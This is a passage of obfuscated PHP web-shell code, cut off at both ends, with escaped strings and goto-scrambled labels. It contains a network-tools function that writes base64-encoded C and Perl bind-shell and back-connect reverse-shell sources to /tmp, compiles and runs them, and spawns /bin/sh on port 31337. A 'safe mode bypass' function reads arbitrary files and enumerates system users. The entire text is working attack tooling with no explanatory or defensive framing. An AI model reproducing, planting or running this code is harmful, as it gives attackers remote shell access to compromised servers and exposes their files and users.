$home_cwd); $cwd = str_replace("\134", "\57", $cwd); } goto wJWJM; ewK8X: if (empty($_POST["\143\150\141\x72\x73\x65\x74"])) { $_POST["\x63\150\x61\162\163\145\164"] = $; } goto hJVFy; ee0Wn: $ = md5($pw_unhashed); goto z59JV; gaWab: function actionNetwork() { hardHeader(); $back_connect_c = "\x49\62\154\x75\x59\x32\x78\x31\x5a\107\125\x67\120\x48\116\x30\x5a\107\154\166\114\155\x67\x2b\104\121\157\x6a\x61\x57\65\152\142\x48\x56\x6b\x5a\x53\101\70\x63\x33\x6c\x7a\x4c\63\116\166\131\x32\164\154\x64\103\x35\157\x50\147\x30\x4b\111\x32\154\165\x59\62\x78\x31\x5a\x47\x55\x67\x50\x47\x35\x6c\x64\107\154\165\132\130\121\x76\141\x57\x34\x75\x61\104\64\x4e\103\155\154\x75\144\x43\102\164\x59\127\154\x75\x4b\x47\x6c\165\144\103\x42\x68\143\155\144\152\114\x43\x42\x6a\x61\107\106\171\x49\103\x70\150\143\x6d\144\62\x57\61\60\x70\x49\x48\163\116\x43\151\101\147\x49\103\102\160\x62\156\121\147\132\x6d\x51\x37\x44\x51\157\x67\x49\103\x41\x67\x63\63\122\x79\x64\x57\x4e\x30\111\x48\x4e\166\x59\x32\164\x68\132\x47\x52\x79\130\x32\154\x75\x49\x48\x4e\160\142\x6a\x73\x4e\x43\x69\x41\147\111\103\x42\x6b\x59\x57\126\x74\142\62\x34\x6f\x4d\123\167\x77\113\x54\163\116\x43\151\101\x67\111\103\x42\172\x61\x57\64\x75\x63\62\x6c\165\130\x32\x5a\x68\x62\x57\154\x73\x65\x53\101\x39\x49\105\x46\x47\x58\x30\x6c\x4f\122\126\121\67\x44\121\157\x67\x49\103\x41\x67\x63\62\x6c\165\114\x6e\x4e\x70\142\x6c\71\167\142\x33\112\x30\x49\104\x30\147\141\x48\122\166\x62\x6e\x4d\157\131\x58\122\x76\141\123\150\x68\143\155\x64\x32\x57\172\112\144\113\123\x6b\x37\x44\121\157\x67\111\103\101\147\143\62\154\165\114\156\x4e\160\x62\x6c\x39\x68\132\107\122\x79\x4c\156\116\146\131\127\122\x6b\143\x69\x41\x39\x49\107\154\x75\x5a\130\x52\146\x59\127\122\x6b\x63\x69\150\x68\x63\155\x64\62\x57\172\106\144\x4b\x54\x73\x4e\x43\x69\x41\147\111\x43\102\x6d\132\x43\x41\x39\x49\110\116\x76\x59\x32\x74\x6c\x64\103\x68\102\122\x6c\71\112\124\x6b\x56\x55\114\x43\102\124\124\60\x4e\114\x58\61\116\x55\x55\x6b\126\x42\124\x53\x77\x67\x53\126\102\x51\125\x6b\71\x55\124\x31\71\125\121\61\101\160\x49\104\163\x4e\103\151\101\x67\111\103\102\160\x5a\x69\x41\x6f\113\107\116\166\142\x6d\x35\154\x59\63\x51\x6f\132\155\x51\x73\x49\x43\x68\x7a\144\110\x4a\61\131\63\121\x67\143\x32\x39\152\x61\x32\x46\x6b\132\x48\111\147\113\x69\153\x67\112\x6e\x4e\160\142\151\x77\x67\x63\62\x6c\x36\x5a\x57\x39\x6d\x4b\x48\116\60\x63\x6e\x56\152\x64\103\102\x7a\x62\x32\116\162\131\x57\122\x6b\143\x69\x6b\160\113\124\167\x77\x4b\x53\x42\67\104\121\157\147\111\103\x41\147\111\x43\101\147\x49\x48\102\154\143\156\x4a\x76\143\x69\x67\151\x51\x32\71\165\x62\155\x56\152\x64\103\102\x6d\131\x57\154\x73\111\x69\x6b\67\104\121\157\x67\111\103\x41\147\111\x43\101\147\x49\x48\x4a\x6c\x64\110\126\171\142\x69\101\x77\117\167\x30\113\x49\x43\x41\147\x49\110\60\116\x43\151\101\x67\x49\103\x42\153\144\x58\x41\x79\x4b\107\x5a\153\x4c\x43\x41\167\x4b\x54\163\x4e\x43\151\x41\x67\x49\x43\x42\x6b\144\x58\x41\171\x4b\107\132\153\x4c\103\101\170\x4b\124\x73\116\x43\151\101\x67\x49\103\x42\153\144\x58\101\171\113\x47\x5a\153\x4c\103\101\x79\x4b\124\163\x4e\x43\x69\x41\x67\111\103\x42\172\145\130\116\x30\132\x57\60\x6f\x49\x69\71\151\141\127\x34\166\x63\62\147\x67\x4c\x57\153\x69\x4b\124\x73\116\x43\151\x41\x67\111\x43\102\152\x62\x47\71\172\x5a\x53\x68\155\x5a\103\153\x37\x44\121\x70\71"; $back_connect_p = "\x49\171\x45\x76\x64\130\116\x79\x4c\62\x4a\160\x62\151\71\x77\x5a\x58\112\x73\104\x51\160\61\143\x32\x55\147\125\x32\71\152\x61\x32\126\60\x4f\x77\x30\113\112\107\x6c\150\x5a\107\122\x79\x50\x57\154\x75\x5a\130\122\146\x59\x58\122\x76\142\151\x67\153\x51\126\112\x48\x56\154\x73\167\x58\x53\x6b\x67\x66\110\167\147\132\x47\x6c\154\x4b\x43\112\106\143\156\112\x76\143\x6a\x6f\147\112\103\x46\143\142\x69\x49\160\x4f\x77\x30\113\x4a\x48\102\150\132\107\x52\171\x50\x58\x4e\x76\131\62\x74\150\132\x47\122\x79\x58\62\154\x75\x4b\103\x52\102\x55\x6b\144\x57\127\x7a\106\x64\x4c\x43\x41\153\x61\x57\x46\x6b\132\110\x49\x70\111\x48\170\70\x49\107\x52\160\x5a\123\147\151\x52\130\112\x79\142\63\x49\x36\111\x43\121\150\x58\x47\64\151\x4b\124\163\116\103\151\x52\167\x63\155\x39\60\142\x7a\x31\x6e\132\x58\122\167\143\155\71\x30\x62\62\x4a\x35\x62\x6d\106\164\x5a\x53\x67\x6e\144\107\116\167\x4a\x79\153\x37\x44\x51\x70\x7a\x62\62\x4e\162\132\130\121\x6f\x55\60\71\x44\123\60\126\x55\x4c\x43\102\x51\122\154\71\112\124\153\126\x55\x4c\103\x42\124\x54\x30\116\114\130\61\116\x55\125\x6b\126\x42\x54\123\167\147\112\110\102\171\x62\x33\122\x76\x4b\123\102\70\146\103\x42\x6b\x61\x57\125\x6f\111\x6b\126\x79\x63\x6d\71\171\x4f\151\101\x6b\111\x56\170\x75\x49\151\x6b\x37\104\x51\x70\152\142\x32\x35\x75\132\x57\116\x30\x4b\106\x4e\120\121\x30\x74\106\x56\x43\167\147\112\x48\102\x68\x5a\107\x52\x79\113\123\x42\70\x66\103\x42\x6b\141\x57\x55\x6f\x49\x6b\126\171\x63\x6d\71\x79\x4f\x69\101\153\111\x56\170\x75\111\x69\153\x37\x44\x51\x70\x76\x63\x47\126\165\x4b\106\116\x55\122\x45\x6c\x4f\114\x43\101\151\120\151\x5a\124\x54\60\x4e\x4c\x52\x56\121\x69\113\x54\x73\116\x43\155\x39\167\x5a\x57\x34\x6f\125\61\x52\x45\124\61\126\125\114\103\x41\151\x50\151\132\x54\124\x30\116\x4c\122\126\121\x69\113\x54\x73\x4e\103\x6d\71\x77\132\x57\x34\x6f\x55\61\x52\x45\122\x56\x4a\x53\114\x43\x41\151\120\151\x5a\124\124\60\x4e\114\122\x56\x51\x69\113\124\163\x4e\x43\156\x4e\x35\143\x33\122\154\x62\123\147\156\114\62\x4a\160\142\151\71\x7a\141\x43\101\x74\x61\x53\x63\x70\117\x77\x30\113\131\62\170\166\143\62\x55\157\x55\x31\x52\x45\x53\x55\x34\x70\117\167\x30\113\x59\62\170\166\x63\x32\x55\157\x55\x31\x52\105\124\x31\x56\125\x4b\x54\163\x4e\x43\155\x4e\163\142\x33\116\154\113\x46\x4e\x55\x52\105\x56\x53\125\x69\153\67"; $bind_port_c = "\x49\x32\154\x75\131\x32\x78\61\132\x47\x55\147\120\110\116\60\132\x47\154\166\114\x6d\147\53\104\x51\x6f\152\141\x57\x35\152\142\110\x56\x6b\132\x53\101\x38\143\63\122\x79\x61\x57\x35\x6e\x4c\155\147\x2b\104\x51\x6f\152\x61\127\65\x6a\142\110\x56\153\x5a\x53\x41\70\144\x57\65\160\143\x33\122\153\x4c\155\147\53\104\x51\157\x6a\x61\127\x35\x6a\142\110\x56\x6b\x5a\x53\x41\70\x62\155\126\x30\132\107\111\165\141\x44\x34\116\x43\x69\116\x70\142\155\116\x73\144\x57\x52\154\x49\104\x78\x7a\x64\107\x52\163\141\x57\111\x75\141\104\x34\116\x43\155\x6c\165\x64\x43\x42\164\x59\127\154\165\113\x47\x6c\165\x64\103\x42\150\x63\x6d\x64\x6a\114\103\x42\152\141\x47\x46\171\x49\x43\x6f\161\131\x58\x4a\x6e\144\151\x6b\147\145\167\x30\113\x49\x43\x41\147\111\107\x6c\165\x64\103\102\172\114\107\115\x73\141\124\163\x4e\x43\x69\101\x67\111\103\x42\x6a\141\x47\106\x79\x49\x48\102\x62\115\172\x42\144\x4f\167\60\113\111\x43\x41\147\111\x48\116\x30\143\x6e\126\152\x64\x43\x42\x7a\142\62\x4e\x72\131\127\122\x6b\143\x6c\71\x70\x62\151\102\x79\x4f\167\x30\113\111\103\101\x67\111\107\x52\x68\132\x57\61\166\142\x69\x67\170\x4c\x44\101\x70\117\x77\x30\113\x49\103\x41\147\111\110\x4d\x67\x50\123\x42\172\142\x32\116\162\x5a\130\x51\x6f\x51\x55\132\146\123\125\65\106\126\x43\x78\x54\124\60\116\x4c\130\61\116\x55\125\153\x56\x42\x54\x53\x77\x77\x4b\x54\163\x4e\x43\151\101\147\111\x43\x42\x70\132\x69\x67\150\143\x79\153\x67\x63\x6d\x56\60\x64\130\112\165\x49\x43\60\x78\117\x77\x30\x4b\x49\103\x41\147\111\x48\111\165\x63\x32\154\165\x58\62\x5a\150\x62\127\x6c\x73\145\x53\101\x39\x49\105\106\107\x58\60\x6c\117\122\126\121\67\x44\121\x6f\x67\111\x43\x41\x67\143\151\65\x7a\141\x57\x35\x66\x63\x47\x39\171\x64\x43\101\x39\111\107\150\60\x62\62\65\x7a\113\x47\x46\x30\142\62\153\157\x59\130\x4a\156\144\x6c\163\x78\130\x53\153\160\x4f\x77\x30\113\111\x43\x41\147\x49\110\111\165\143\62\154\x75\130\62\x46\x6b\132\x48\111\x75\143\61\71\x68\132\x47\x52\x79\111\104\60\147\141\x48\x52\x76\x62\155\x77\x6f\123\125\x35\102\122\105\x52\123\x58\x30\106\x4f\127\123\153\x37\x44\121\157\147\x49\x43\x41\x67\x59\x6d\x6c\x75\132\103\150\172\x4c\103\x41\157\143\63\x52\x79\144\x57\x4e\60\x49\x48\116\x76\131\x32\x74\x68\x5a\107\122\x79\111\103\157\x70\x4a\156\111\x73\x49\x44\x42\x34\115\x54\x41\160\x4f\x77\60\113\111\103\101\x67\x49\x47\170\160\x63\x33\122\154\x62\x69\150\172\114\x43\x41\x31\x4b\124\163\x4e\x43\x69\x41\x67\111\x43\x42\x33\x61\x47\x6c\x73\132\123\x67\x78\113\123\102\x37\x44\x51\x6f\x67\x49\103\101\x67\x49\x43\101\147\111\x47\x4d\x39\x59\x57\x4e\x6a\x5a\130\x42\60\x4b\110\x4d\163\x4d\x43\167\x77\113\x54\163\x4e\x43\x69\x41\147\111\x43\x41\147\x49\x43\101\147\132\110\x56\167\x4d\x69\150\x6a\x4c\x44\x41\160\x4f\x77\x30\113\111\103\x41\x67\111\103\x41\147\x49\x43\102\x6b\x64\x58\101\171\113\107\115\163\115\123\x6b\67\x44\121\x6f\x67\x49\103\101\147\111\103\x41\147\x49\107\122\61\143\x44\x49\157\x59\x79\x77\x79\x4b\124\x73\x4e\x43\x69\x41\x67\x49\x43\101\x67\x49\103\101\x67\144\63\x4a\160\x64\107\x55\x6f\131\x79\x77\151\x55\x47\106\172\x63\x33\144\x76\143\x6d\x51\66\x49\x69\167\x35\113\x54\x73\116\x43\151\101\x67\111\x43\101\147\x49\103\101\x67\x63\x6d\x56\x68\132\103\x68\x6a\114\110\101\163\x63\x32\x6c\x36\x5a\127\71\155\x4b\110\x41\160\113\x54\x73\x4e\x43\x69\101\147\x49\x43\101\x67\111\103\101\x67\x5a\155\71\x79\113\107\x6b\x39\x4d\104\x74\x70\120\110\x4e\x30\x63\155\x78\x6c\142\151\x68\x77\113\x54\164\x70\x4b\x79\163\160\x44\121\x6f\x67\111\x43\101\147\x49\103\101\147\x49\x43\x41\147\x49\x43\102\x70\132\151\147\147\x4b\110\102\x62\x61\x56\x30\x67\x50\124\60\x67\112\61\170\165\x4a\x79\x6b\147\x66\x48\x77\147\x4b\110\102\x62\141\126\x30\x67\120\x54\x30\147\x4a\x31\170\x79\x4a\171\153\x67\113\121\60\113\111\x43\x41\147\111\103\x41\x67\111\103\101\x67\x49\103\x41\x67\111\x43\101\x67\111\x48\102\142\x61\x56\60\x67\120\123\x41\x6e\130\104\101\156\117\167\x30\x4b\111\x43\101\x67\x49\x43\x41\147\111\103\102\160\132\x69\101\157\143\63\122\171\131\62\x31\x77\x4b\x47\x46\x79\132\63\132\x62\115\x6c\60\163\143\103\153\147\120\124\60\x67\115\103\153\116\103\151\x41\x67\111\103\101\x67\111\x43\101\x67\x49\x43\x41\x67\x49\110\116\65\x63\x33\122\x6c\142\123\x67\151\114\62\x4a\x70\142\151\71\172\x61\103\x41\164\141\x53\111\x70\117\x77\x30\x4b\111\103\x41\147\x49\103\x41\x67\111\103\x42\x6a\142\107\x39\x7a\x5a\x53\150\152\113\x54\163\116\103\151\101\x67\111\103\102\x39\104\x51\160\x39"; $bind_port_p = "\x49\x79\105\x76\144\x58\116\171\x4c\62\x4a\160\142\151\x39\x77\x5a\130\x4a\x73\104\121\157\x6b\x55\60\x68\106\x54\105\167\71\x49\151\x39\x69\x61\x57\x34\166\143\x32\147\x67\x4c\x57\153\151\x4f\167\x30\x4b\141\127\131\147\x4b\105\x42\x42\125\153\144\x57\x49\104\x77\x67\115\x53\153\147\145\x79\x42\x6c\x65\107\x6c\60\113\x44\105\160\117\171\x42\x39\x44\121\160\61\143\x32\x55\147\125\62\71\x6a\x61\62\126\x30\x4f\x77\x30\x4b\x63\x32\x39\x6a\x61\62\x56\60\x4b\106\115\163\112\x6c\102\107\x58\60\154\117\x52\126\121\163\112\154\116\120\121\60\164\146\125\x31\x52\123\122\x55\x46\x4e\114\x47\x64\154\144\110\x42\x79\x62\x33\x52\x76\x59\x6e\154\x75\131\x57\x31\154\113\103\144\60\x59\63\101\156\113\x53\x6b\x67\146\110\x77\x67\132\107\154\x6c\111\103\x4a\x44\131\127\x35\x30\111\x47\116\171\132\127\x46\x30\132\x53\102\172\x62\62\x4e\162\132\130\122\x63\142\151\111\67\104\x51\160\x7a\x5a\x58\x52\172\x62\62\x4e\x72\142\63\102\x30\x4b\106\115\163\125\x30\71\x4d\x58\x31\116\x50\x51\60\x74\106\x56\103\x78\x54\x54\61\x39\x53\122\x56\126\x54\x52\x55\106\x45\x52\x46\x49\163\115\x53\153\67\104\121\160\x69\x61\x57\x35\153\x4b\x46\x4d\163\143\62\x39\x6a\x61\62\106\x6b\x5a\110\x4a\x66\141\x57\64\x6f\x4a\x45\106\123\122\61\132\x62\x4d\106\x30\163\x53\125\x35\x42\122\105\x52\123\x58\x30\106\x4f\x57\x53\x6b\160\x49\110\170\70\111\x47\122\x70\x5a\123\x41\x69\121\62\106\165\x64\x43\102\166\143\x47\126\165\x49\110\102\x76\x63\x6e\122\143\x62\151\x49\x37\104\121\x70\x73\141\x58\116\60\x5a\x57\x34\x6f\x55\x79\167\x7a\x4b\123\x42\x38\146\x43\x42\x6b\141\127\125\x67\x49\153\x4e\150\142\156\x51\147\142\107\154\x7a\144\x47\x56\165\111\110\102\166\143\156\x52\x63\142\151\111\67\104\x51\x70\x33\x61\x47\154\x73\132\x53\147\x78\113\x53\x42\x37\x44\x51\x6f\112\131\127\116\152\x5a\x58\102\60\x4b\x45\116\120\124\153\x34\x73\x55\x79\x6b\67\x44\121\x6f\x4a\x61\x57\x59\x6f\111\123\147\153\x63\x47\x6c\153\x50\127\x5a\166\143\x6d\163\160\113\x53\102\x37\104\x51\x6f\112\103\127\122\160\132\123\101\151\121\62\106\165\142\x6d\71\60\111\107\x5a\166\143\x6d\163\x69\111\x47\154\x6d\x49\103\147\x68\132\107\126\155\141\x57\x35\154\132\103\x41\153\x63\x47\x6c\x6b\x4b\x54\x73\116\x43\x67\153\x4a\x62\x33\x42\x6c\x62\151\102\x54\x56\x45\122\x4a\x54\x69\x77\x69\x50\x43\132\104\x54\x30\65\117\111\152\163\x4e\x43\x67\x6b\112\142\63\102\154\x62\x69\102\x54\126\x45\x52\x50\126\126\x51\x73\111\152\x34\155\x51\60\x39\x4f\124\x69\111\67\104\x51\x6f\x4a\103\127\71\167\x5a\127\x34\x67\125\61\122\105\x52\126\x4a\123\x4c\103\111\53\x4a\153\x4e\x50\x54\x6b\x34\x69\x4f\167\x30\113\x43\x51\154\x6c\145\107\126\152\x49\x43\122\x54\123\105\x56\x4d\x54\x43\x42\x38\x66\x43\102\153\141\127\125\147\143\x48\x4a\160\142\156\x51\x67\121\x30\71\117\x54\151\101\x69\x51\62\106\165\144\103\102\154\145\x47\x56\x6a\x64\130\x52\x6c\111\103\122\124\123\105\126\x4d\124\x46\x78\165\x49\x6a\163\116\103\147\x6b\x4a\131\62\x78\x76\143\x32\x55\x67\x51\x30\71\x4f\124\152\163\116\x43\147\x6b\112\x5a\x58\x68\160\x64\103\101\167\x4f\167\60\113\103\x58\60\x4e\x43\156\x30\75"; echo "\74\150\x31\76\116\145\164\x77\157\x72\153\40\x74\157\157\x6c\163\x3c\x2f\150\61\76\x3c\x64\151\x76\x20\x63\x6c\141\x73\163\x3d\143\x6f\x6e\x74\145\156\x74\x3e\xa\x9\x3c\x66\157\x72\155\x20\x6e\x61\x6d\x65\x3d\x27\156\x66\160\47\40\x6f\156\123\x75\142\x6d\151\164\75\47\x67\x28\156\165\x6c\154\x2c\x6e\165\154\154\54\164\x68\x69\x73\x2e\165\x73\151\156\147\56\166\x61\154\165\145\x2c\x74\150\151\x73\56\160\157\x72\164\56\x76\x61\x6c\x75\x65\54\164\x68\x69\163\x2e\x70\141\x73\x73\56\166\141\x6c\165\x65\x29\73\162\x65\164\x75\162\x6e\x20\146\141\x6c\163\145\73\x27\x3e\xa\11\74\163\x70\x61\156\76\102\151\156\x64\40\x70\157\162\164\x20\x74\x6f\40\57\142\x69\156\x2f\163\150\x3c\x2f\x73\x70\x61\x6e\x3e\x3c\142\x72\57\x3e\xa\11\120\157\x72\x74\72\40\74\151\156\160\165\164\40\x74\171\160\145\x3d\x27\x74\145\x78\x74\x27\40\x6e\x61\x6d\x65\75\47\160\157\162\164\x27\40\x76\x61\x6c\165\145\75\47\x33\61\63\63\x37\47\x3e\40\x50\141\x73\163\x77\x6f\x72\144\72\x20\74\151\x6e\160\165\x74\x20\x74\x79\160\145\x3d\47\x74\145\170\x74\x27\40\x6e\141\x6d\x65\75\x27\x70\141\x73\163\47\76\40\125\x73\151\156\147\x3a\40\74\x6c\x61\142\145\154\x3e\x3c\x73\x65\154\x65\143\164\x20\x6e\141\155\x65\75\x27\x75\x73\x69\156\x67\47\76\x3c\x6f\x70\x74\x69\157\x6e\40\x76\141\x6c\x75\x65\x3d\47\x62\x70\143\x27\x3e\103\74\x2f\157\160\x74\151\157\156\76\x3c\x6f\x70\164\x69\x6f\156\x20\x76\x61\154\165\145\75\x27\x62\160\x70\x27\x3e\120\x65\162\154\74\x2f\157\160\164\151\157\x6e\76\74\57\163\x65\154\x65\143\164\76\74\57\x6c\141\142\x65\x6c\76\x20\x3c\151\x6e\x70\x75\164\40\x74\x79\x70\145\75\x73\165\x62\155\x69\x74\x20\166\x61\154\x75\x65\x3d\x27\x73\165\x62\155\151\164\x27\76\12\11\74\x2f\146\157\162\x6d\x3e\xa\x9\74\146\x6f\162\155\x20\x6e\x61\x6d\145\75\47\156\146\x70\47\40\157\156\123\x75\142\x6d\x69\x74\x3d\47\x67\x28\156\x75\x6c\154\x2c\156\x75\154\x6c\x2c\164\x68\151\x73\x2e\x75\163\x69\156\147\x2e\x76\x61\154\165\x65\x2c\x74\150\x69\163\56\x73\145\x72\x76\145\x72\56\166\x61\154\165\x65\54\x74\x68\x69\163\56\x70\157\x72\164\x2e\x76\141\x6c\x75\x65\x29\x3b\x72\145\164\165\162\x6e\x20\146\141\154\x73\145\73\47\x3e\12\x9\74\163\160\x61\156\x3e\x42\141\143\153\x2d\x63\157\156\x6e\x65\x63\164\x20\x74\157\74\x2f\x73\160\x61\x6e\76\74\x62\162\x2f\76\12\11\x53\x65\x72\x76\x65\x72\x3a\40\x3c\151\156\160\x75\164\40\x74\x79\160\x65\x3d\47\164\x65\170\164\47\40\156\x61\x6d\145\75\47\x73\145\162\x76\145\162\x27\40\x76\141\154\165\x65\x3d" . $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\104\x44\x52"] . "\x3e\x20\x50\157\162\x74\72\x20\x3c\x69\156\x70\165\164\40\x74\171\160\145\75\x27\164\145\x78\164\47\40\x6e\141\x6d\145\75\x27\160\x6f\x72\x74\47\40\x76\x61\x6c\165\x65\x3d\x27\63\x31\63\63\x37\x27\76\40\125\x73\x69\x6e\147\x3a\40\x3c\154\141\x62\145\x6c\76\74\x73\x65\154\145\x63\164\40\156\x61\x6d\145\x3d\47\165\163\151\156\147\x27\x3e\x3c\x6f\160\x74\151\x6f\x6e\x20\x76\141\154\x75\145\x3d\47\x62\143\143\x27\x3e\x43\74\x2f\x6f\x70\164\151\x6f\x6e\76\x3c\x6f\x70\x74\x69\x6f\x6e\x20\166\141\x6c\165\145\75\47\142\143\x70\47\x3e\120\x65\162\x6c\x3c\x2f\157\160\164\x69\x6f\156\x3e\74\x2f\163\x65\154\145\143\164\x3e\74\x2f\x6c\x61\x62\145\154\76\x20\74\x69\156\x70\x75\x74\x20\x74\x79\160\145\75\x73\165\x62\x6d\x69\x74\x20\166\141\x6c\x75\x65\75\x27\x73\165\142\x6d\x69\164\x27\76\xa\x9\x3c\57\x66\157\x72\155\x3e\x3c\x62\162\76"; if (isset($_POST["\x70\x31"])) { function cf($f, $t) { $w = @fopen($f, "\167") or @function_exists("\x66\x69\x6c\x65\137\x70\165\x74\137\x63\157\x6e\x74\145\x6e\x74\x73"); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["\160\x31"] == "\x62\160\x63") { cf("\x2f\x74\x6d\160\57\x62\160\56\143", $bind_port_c); $ = ex("\147\143\143\40\x2d\x6f\40\57\x74\x6d\160\57\142\160\40\57\x74\155\160\57\x62\x70\x2e\x63"); @unlink("\x2f\x74\155\x70\x2f\142\x70\x2e\143"); $ .= ex("\x2f\x74\155\x70\x2f\x62\x70\40" . $_POST["\160\x32"] . "\x20" . $_POST["\160\63"] . "\x20\x26"); echo "\74\x70\x72\x65\x20\143\154\x61\163\163\75\155\x6c\61\x3e{$}" . ex("\x70\x73\40\141\165\x78\x20\174\x20\147\x72\x65\x70\40\142\160") . "\74\57\160\x72\x65\x3e"; } if ($_POST["\160\x31"] == "\x62\x70\x70") { cf("\x2f\164\155\160\57\x62\160\x2e\160\154", $bind_port_p); $ = ex(which("\x70\x65\x72\154") . "\x20\57\x74\155\x70\x2f\142\160\x2e\x70\x6c\x20" . $_POST["\x70\x32"] . "\x20\x26"); echo "\x3c\160\x72\145\40\x63\154\x61\x73\163\75\x6d\x6c\61\76{$}" . ex("\x70\163\40\x61\x75\x78\x20\x7c\40\147\x72\145\160\40\x62\160\x2e\x70\x6c") . "\74\57\160\162\145\76"; } if ($_POST["\x70\x31"] == "\142\143\143") { cf("\x2f\164\x6d\160\57\x62\x63\x2e\x63", $back_connect_c); $ = ex("\x67\x63\143\40\55\157\40\x2f\x74\155\x70\x2f\142\143\x20\x2f\164\155\160\x2f\142\x63\56\x63"); @unlink("\x2f\164\155\x70\57\142\x63\56\x63"); $ .= ex("\57\x74\155\160\57\x62\143\x20" . $_POST["\x70\x32"] . "\x20" . $_POST["\x70\63"] . "\x20\46"); echo "\74\x70\x72\x65\40\143\x6c\x61\x73\163\75\155\x6c\61\76{$}" . ex("\160\x73\40\141\x75\170\40\174\40\x67\x72\145\x70\x20\142\143") . "\x3c\57\x70\162\145\76"; } if ($_POST["\160\x31"] == "\142\143\160") { cf("\57\x74\155\160\x2f\x62\x63\x2e\160\x6c", $back_connect_p); $ = ex(which("\x70\x65\x72\x6c") . "\x20\57\164\x6d\160\x2f\142\143\56\x70\x6c\40" . $_POST["\160\62"] . "\x20" . $_POST["\160\x33"] . "\x20\x26"); echo "\x3c\160\162\x65\x20\x63\x6c\141\x73\x73\x3d\x6d\x6c\x31\x3e{$}" . ex("\160\163\x20\x61\x75\x78\x20\x7c\40\x67\162\x65\x70\x20\142\143\56\x70\x6c") . "\74\57\x70\x72\145\76"; } } echo "\74\57\144\151\x76\x3e"; hardFooter(); } goto PYh2w; aQUM2: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["\160\x31"]) { case 1: $temp = @tempnam($test, "\143\x78"); if (@copy("\x63\157\155\x70\x72\145\x73\163\56\x7a\154\151\142\72\57\x2f" . $_POST["\x70\62"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "\123\x6f\x72\162\171\56\x2e\56\x20\103\141\x6e\47\x74\40\157\x70\x65\x6e\40\x66\151\x6c\x65"; } break; case 2: $files = glob($_POST["\x70\x32"] . "\x2a"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\12"; } } break; case 3: $ch = curl_init("\x66\x69\154\145\x3a\x2f\57" . $_POST["\160\62"] . "\x0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("\x73\141\146\x65\137\x6d\x6f\x64\145"); ini_restore("\157\160\x65\x6e\137\x62\141\163\x65\x64\151\x72"); include $_POST["\x70\x32"]; break; case 5: for (; $_POST["\x70\62"] <= $_POST["\160\63"]; $_POST["\160\x32"]++) { $uid = @posix_getpwuid($_POST["\x70\62"]); if ($uid) { echo join("\72", $uid) . "\12"; } } break; case 6: if (!function_exists("\x69\x6d\141\160\137\157\160\x65\156")) { break; } $stream = imap_open($_POST["\160\62"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "\74\x68\61\x3e\123\x61\x66\x65\x20\155\157\x64\x65\40\142\171\x70\x61\x73\163\x3c\x2f\150\61\76\74\144\151\166\x20\143\x6c\x61\x73\163\75\x63\157\156\164\x65\156\164\x3e"; echo "\74\163\x70\x61\x6e\76\x43\x6f\x70\x79\40\x28\x72\x65\x61\x64\40\146\151\154\145\x29\x3c\57\x73\x70\141\156\76\x3c\x66\x6f\162\x6d\x20\157\x6e\163\x75\x62\x6d\x69\x74\75\x27\147\x28\x6e\165\x6c\154\54\156\165\154\154\x2c\x22\61\x22\x2c\x74\x68\151\163\56\x70\x61\162\141\155\x2e\166\x61\154\x75\145\x29\73\162\145\164\x75\162\156\x20\146\141\x6c\163\x65\73\47\76\74\x69\x6e\160\x75\164\x20\x63\x6c\141\x73\x73\75\42\x74\157\x6f\x6c\x73\111\156\x70\42\x20\164\171\160\145\75\x74\145\170\x74\40\156\x61\x6d\145\75\x70\x61\x72\141\155\x3e\x3c\x69\156\x70\x75\x74\x20\x74\171\x70\145\x3d\x73\165\x62\x6d\151\x74\40\166\x61\x6c\x75\x65\75\x22\x73\165\142\155\151\164\42\76\x3c\x2f\x66\x6f\x72\x6d\x3e\x3c\142\x72\x3e\74\163\160\141\x6e\x3e\107\x6c\157\x62\x20\50\154\x69\163\x74\40\144\x69\x72\51\74\57\x73\160\141\156\x3e\x3c\146\157\162\x6d\x20\157\156\x73\165\142\x6d\x69\164\75\x27\x67\x28\x6e\165\x6c\x6c\54\156\x75\x6c\x6c\x2c\x22\x32\42\x2c\164\x68\x69\x73\56\x70\x61\162\141\155\56\166\141\x6c\x75\145\x29\73\162\145\164\x75\x72\156\x20\146\141\154\x73\145\73\x27\76\x3c\x69\x6e\160\x75\164\40\x63\154\141\163\x73\75\x22\x74\x6f\x6f\x6c\x73\111\x6e\x70\x22\x20\164\x79\160\x65\75\164\x65\170\x74\x20\x6e\x61\155\x65\75\x70\x61\162\x61\x6d\x3e\74\151\x6e\160\x75\164\x20\x74\x79\160\145\x3d\x73\x75\x62\155\151\164\x20\x76\x61\154\165\145\x3d\x22\163\x75\142\155\x69\x74\x22\x3e\x3c\57\146\157\x72\155\76\74\x62\162\76\74\163\x70\141\156\x3e\103\165\162\x6c\x20\50\x72\145\141\144\x20\146\151\x6c\x65\51\x3c\x2f\x73\160\x61\x6e\x3e\74\146\157\162\x6d\40\157\x6e\163\x75\x62\x6d\151\x74\x3d\47\x67\50\x6e\x75\x6c\x6c\x2c\156\x75\x6c\x6c\54\x22\x33\x22\54\x74\150\x69\x73\x2e\160\141\x72\x61\x6d\x2e\166\x61\x6c\x75\x65\51\73\162\145\164\x75\162\x6e\40\146\x61\154\163\145\x3b\47\x3e\x3c\151\156\x70\165\x74\x20\143\154\141\x73\x73\x3d\x22\164\x6f\157\x6c\x73\111\156\x70\42\40\x74\171\160\145\75\164\x65\x78\x74\x20\156\x61\155\x65\75\160\141\162\141\x6d\76\74\151\156\160\x75\x74\x20\164\x79\160\x65\x3d\163\x75\142\x6d\151\164\x20\x76\141\154\x75\x65\x3d\x22\x73\x75\142\x6d\151\x74\x22\76\x3c\x2f\146\x6f\x72\155\76\74\x62\162\76\74\x73\x70\x61\x6e\x3e\x49\156\x69\137\162\145\163\164\x6f\162\x65\40\x28\x72\x65\141\x64\x20\146\x69\154\145\51\x3c\57\x73\x70\141\x6e\x3e\x3c\x66\157\162\155\x20\x6f\x6e\163\x75\142\x6d\151\x74\75\47\x67\x28\x6e\x75\154\x6c\54\156\x75\154\x6c\x2c\x22\x34\x22\54\164\x68\151\163\56\160\141\162\141\x6d\x2e\166\x61\x6c\x75\x65\x29\x3b\x72\x65\164\x75\162\156\x20\x66\141\154\163\x65\73\